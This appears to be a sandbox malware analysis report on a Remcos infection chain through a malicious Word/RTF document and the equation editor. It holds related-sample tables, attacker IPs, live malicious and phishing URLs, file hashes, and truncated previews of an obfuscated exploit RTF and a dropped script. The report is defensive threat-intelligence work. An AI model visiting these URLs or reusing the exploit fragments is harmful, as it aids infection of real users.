                                                                                                                                geoplugin.netPayment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                TT12822024.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Cdp51q2lyM.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                FASTLYUShttps://app.getresponse.com/change_details.html?x=a62b&m=BrgFNl&s=BW9rcZD&u=C3YQM&z=EMkQID6&pt=change_detailsGet hashmaliciousUnknownBrowse
                                                                                                                                • 151.101.129.140
                                                                                                                                Payment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.110.133
                                                                                                                                https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 151.101.65.224
                                                                                                                                https://jv.prenticeu.com/SAFlSIeECgRZt_tUKXhAOQHYyqb5e4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 151.101.2.137
                                                                                                                                https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 151.101.65.224
                                                                                                                                https://bestratedrobotvacuum.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                                                                                                                • 151.101.2.206
                                                                                                                                https://taplink.cc/universalgrcGet hashmaliciousUnknownBrowse
                                                                                                                                • 151.101.129.229
                                                                                                                                American-equity Updated Employee sheet .odtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 151.101.2.137
                                                                                                                                DRAFT_PO.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                (No subject) (82).emlGet hashmaliciousUnknownBrowse
                                                                                                                                • 151.101.67.1
                                                                                                                                AS-COLOCROSSINGUSORDER-24930-067548.jsGet hashmaliciousStormKitty, XWormBrowse
                                                                                                                                • 192.210.215.11
                                                                                                                                AE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.245.123.9
                                                                                                                                5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                                                                                • 107.173.4.16
                                                                                                                                SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 107.173.4.16
                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                • 104.168.7.7
                                                                                                                                SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.245.123.6
                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.168.7.7
                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.168.7.7
                                                                                                                                PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 107.173.4.16
                                                                                                                                ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 192.3.101.137
                                                                                                                                ATOM86-ASATOM86NLPayment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                TT12822024.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Cdp51q2lyM.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                AARNET-AS-APAustralianAcademicandResearchNetworkAARNeElectronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                                                                                • 103.67.200.72
                                                                                                                                V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 103.186.116.220
                                                                                                                                Quote.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 103.186.117.77
                                                                                                                                Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 103.186.116.93
                                                                                                                                https://en.softonic.comGet hashmaliciousUnknownBrowse
                                                                                                                                • 103.67.200.72
                                                                                                                                yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 103.186.116.220
                                                                                                                                http://tkshopjp.top/Get hashmaliciousUnknownBrowse
                                                                                                                                • 103.176.91.125
                                                                                                                                Callus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                                                                                                                                • 103.163.152.75
                                                                                                                                http://activa1dina.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                                • 103.67.200.72
                                                                                                                                Quote.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 103.186.117.77

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                05af1f5ca1b87cc9cc9b25185115607dPayment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                AE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 185.199.111.133
                                                                                                                                • 172.67.216.244
                                                                                                                                7dcce5b76c8b17472d024758970a406bFatura 002.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                Payment proof.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                TT12822024.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                AE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.216.244

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131072
                                                                                                                                Entropy (8bit):0.025577196307894484
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:I3DPcb5zxVvxggLRXy+gE3qMotRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQf7y+gYuvYg3J/
                                                                                                                                MD5:2B6A45709F67C046DDB5A17D7F36171C
                                                                                                                                SHA1:554EC1BE3FD1D3F2569433AFFF70C31E3281E40B
                                                                                                                                SHA-256:65D3CE86B193F2092D008CB2B7DC637B807719A4F36B9755A17AB6B9FF7332CB
                                                                                                                                SHA-512:835794624803B8F1CA3B4D6B2ACB8D0766B25FB5F0AAB932239C9204178D24B8303604E7DB64EF45873CDA0E3B9B812333279E9CEA5FCCD109664DDE8201F4B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:......M.eFy...z.b....F..=...xS,...X.F...Fa.q............................@|.....J......Jf........?,br.i.I.9_..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4760
                                                                                                                                Entropy (8bit):4.834060479684549
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                Malicious:false
                                                                                                                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e...........................................................

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Rich Text Format data, version 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69247
                                                                                                                                Entropy (8bit):2.869208176365265
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:ZD+xsejlud5HY1ayCyu7OHAzlzjRYEX4Bo:ZGjE3qy7OglR9XWo
                                                                                                                                MD5:C9AC55D64A51738B57F065449C7E3911
                                                                                                                                SHA1:7B9DD5B4E76E99D711B0FE11582E6FF06D9CA830
                                                                                                                                SHA-256:8F76E86093D71F34C2E6F824984034185964F3D15C28DF1B61ADF5165FBB212E
                                                                                                                                SHA-512:6D78C5A5CFC7FA34942E87CEAE41D6E97DEBAA9469831FFBC4482C9FC1B531A171B1A12FE6FF3902B8919AEE94BDF619CD0B43DABA07166D9E47042A9EAF8E60
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc, Author: ditekSHen
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:{\rtf1................{\*\lineFillHeight632699961 \;}.{\549664850?7.6_?`3084%_46]*?52[;?@?=+!^%?[?.?.1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[.14~9.?-#;'$,/=7!@'[[.30-2|8.:?)?%=[^8@|'<^+36.:].|;8..^+[*??/3.%7-6,%6._.??=(`.#$3-<%~8|.:?|&)...?84.@5|?;*'(_@.:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3..)@'.]?/.)[|/!%%)##&-;`'?4?].--9_=.!&%..~>,*?&7',#,..?|$!.'!.,.`_*=8_36_:%#?6%>.!`^3/`?*1@.&?8)`36:+[;.#?7`%.;$0&.!?@..--%6@<((`<.[+>*?;0+.7_?7]]`?%.:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=?.?4/97?.78]!2#.%?]=.&|8??&[*]7|%?.^??%]!?_-#>%%5?>|@=?.3`..3>58/?(8,2=?@|,.&?_?%;.4?4?@--?3&(..8.''5,~>~%-==/64|.4&%|3_.~~|@633)?.^8!767_&<%*>7.@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/.8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<..2*&|?[0#+).11%.-[9.:&|88<^>83?843)8&%/,[??<?1?(.'?/&4=0._.%0*<.+,]*)==]3?|`_.`.:|+*2`]2.&!332!!-%;.,!?=%6#(??9/:*&)<_#^|97*?+@?#?|)).?0:*6<:@0;|^?/8)?9&~:0(=6=,?[.4&/&1'`6$>?-7_??+%@5[&@`]<?.&*~??;]*<?~19?9[7!7!96;.#<>)#%'[;^>?!4?>.6?-@@<>6?+?@,`<*:<61?24/]5?

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:JSON data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):962
                                                                                                                                Entropy (8bit):5.013811273052389
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                                Malicious:false
                                                                                                                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\niceworkwithpcitureupdateson[1].tiff

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256672
                                                                                                                                Entropy (8bit):3.748947235455245
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:Nq4GRwdiKr3UfoJzrtFPZcMRQml/qJ1sZh7ryvESig:Nq4GCiKQfoJvPOnmlCJ1oh7+vDh
                                                                                                                                MD5:09386235B48255A0B5B5EE106428A9DD
                                                                                                                                SHA1:AAED31297121E1FCE8222D417EF8BC90471AF3DE
                                                                                                                                SHA-256:5E78D2BAED8277AFF8D71F752F4CA00621B6B487A022A942383883A6791364D2
                                                                                                                                SHA-512:760E43B96EA2D455B414ED9FBCEB6B4BA3CF264E9B86015327DB20E3F1ECFEB5210738C9543C26B0CA270FE92170932ADD452E9935CCD218A65FE76918BB3051
                                                                                                                                Malicious:false
                                                                                                                                Preview:..U.U.L.G.m.c.R.j.Q.N.W.K.p.W.m.k.P.L.W.P.i.n.L.W.h.o. .=. .".k.A.f.z.N.C.K.j.K.G.n.L.B.P.f.e.s.k.S.W.L.K.n.G.c.e.".....A.K.L.a.n.i.e.b.i.U.L.K.b.n.G.B.i.L.K.r.u.m.L.B.W.G. .=. .".S.R.t.G.P.f.i.k.u.l.W.K.W.u.I.v.R.m.N.H.h.C.C.p.k.L.".....H.G.L.P.U.i.z.c.L.P.C.W.q.W.L.x.k.P.e.n.m.R.j.L.k.e. .=. .".W.P.m.c.L.o.T.K.d.U.N.b.L.K.k.L.K.v.W.K.R.N.W.l.T.p.".....i.h.d.j.U.C.o.K.K.A.e.W.v.f.f.G.I.o.q.K.L.G.A.G.A.d. .=. .".Z.e.h.N.e.x.L.g.i.k.C.W.m.W.C.B.l.e.R.z.l.e.x.c.h.B.".....i.W.C.c.P.W.Z.x.H.W.U.e.b.T.p.h.W.e.d.p.e.K.c.k.i.K. .=. .".f.P.d.P.h.W.c.c.h.e.l.R.W.h.K.G.N.U.W.W.e.k.A.r.U.K.".....c.d.K.o.O.p.k.J.o.G.W.K.N.x.Z.L.m.t.W.H.Q.t.W.e.e.m. .=. .".L.L.c.p.A.Z.G.m.l.G.W.Z.a.m.c.t.e.g.L.b.e.G.K.o.r.m.".....Z.L.z.p.L.W.h.G.f.d.b.m.L.G.W.P.G.q.t.d.R.u.W.L.U.a. .=. .".i.N.c.c.z.L.W.G.e.o.e.h.l.z.B.m.P.W.t.L.K.L.W.z.p.L.".....p.e.n.z.U.U.L.N.W.P.h.j.e.H.e.J.e.G.i.o.U.b.e.f.q.K. .=. .".e.f.W.h.z.S.O.t.O.W.u.L.W.m.H.P.R.n.A.Z.h.e.W.U.P.a.".....O.p.h.K.p.i.Z.o.l.A.U.L.f.q.i.O.z.U.c.b.i.L.K.W.k.c. .

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3092612A.emf

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):134544
                                                                                                                                Entropy (8bit):2.9989105127453892
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:SxZNfNMxUS1u40TiTKAvGNeni/m8xXZOm:oZNu6i0TiTKeYh/tTT
                                                                                                                                MD5:A01193C207CD2FE313F5CEDA3FD76B7A
                                                                                                                                SHA1:62173798263F9D7310F3F5942668DEA29AA5A90F
                                                                                                                                SHA-256:6E7BB9F3D39B5A50FA8FD08B066B0A92001BEAEAE96C9FCBFDB5BCFB9F0F6C20
                                                                                                                                SHA-512:6B4344CC538B502EF1F6D3C9FAF2973096B40054A0648078FEF21F451FF61A11906E9BEF01DE80EA4EE032EC8C17877FCC9FB05493512DC210FDA7C5F62F3E22
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n......................................... w. ..0.......)".A.l*w"........atQ.........l*w.........`tQ........0...../....j...........D...../j...........T...{./j.....*wd....O./j.......8....I./ ...h....Y..I./)".A

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63EADC8D.emf

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):66768
                                                                                                                                Entropy (8bit):2.9045642362096498
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:gQbwIVguebyln1oBJ7v4rPMPRDJWKf4kfeHHCCKlRFwiACs:gQb5Tebyl1ojvw4RlWKf41HHC/KiACs
                                                                                                                                MD5:7DC8E1999A1AF96FE63D5E493356A288
                                                                                                                                SHA1:705D5C1FFDF27BF31F6408A1F98FA01547375612
                                                                                                                                SHA-256:611408FC701324B9EE55DE35EF19AA58103007691865E3900EC6E03BDE70F0C9
                                                                                                                                SHA-512:9275DD7D20A0EC72C0E8F1291EEB2237E6464857B50D114E3F615CFC27199EB07256BA65DD04BFDD664EAEBCC50909370D0E42FC10DA8863C3D6413B54DBB622
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l...........k...................@.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72E54AE7.emf

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):318964
                                                                                                                                Entropy (8bit):5.498202232475241
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:hxelS/aoQOP7D4mD3f5R81Zk6ZJE6GOolsvm8:hxelSL34mD3f5ReZdZJElOFm8
                                                                                                                                MD5:1E74425F96A5DDD00E5494225278C22A
                                                                                                                                SHA1:97D7ADC10C419F1EBF2B2754CDFEFD3371CD95B9
                                                                                                                                SHA-256:420C08455ABFF24376B505BC34EE9021A10C5BF5285D3FD038778409EC78B67C
                                                                                                                                SHA-512:E0232C415E1171AABA244152F0D4CDD8328E0EF051FC24CFD2B472199A0AE41A451401A3492C04A612A9ACD3407047047C8A170A4B2A68EB80B4B862B699EA1B
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l...............2...........@m..?... EMF........ .......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\820BD7BC.emf

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):213168
                                                                                                                                Entropy (8bit):2.988970416935335
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:oR4CEQoVghaqdV+9ccR9qyn6z0G1+/WQOyFBUXjM9G2j58ThJAbH92f2bcrjZd0R:l9tkQRmQzpr5Txp1
                                                                                                                                MD5:33B91CBFFE8E675C476B0BA3AFC61062
                                                                                                                                SHA1:447B4D09F2D65DBFB28462556A33A047394E8D97
                                                                                                                                SHA-256:C81DE0EEC367CC4FDDADC14B92EA89BE12C856ACD249D45F93FCD69A8D50FD79
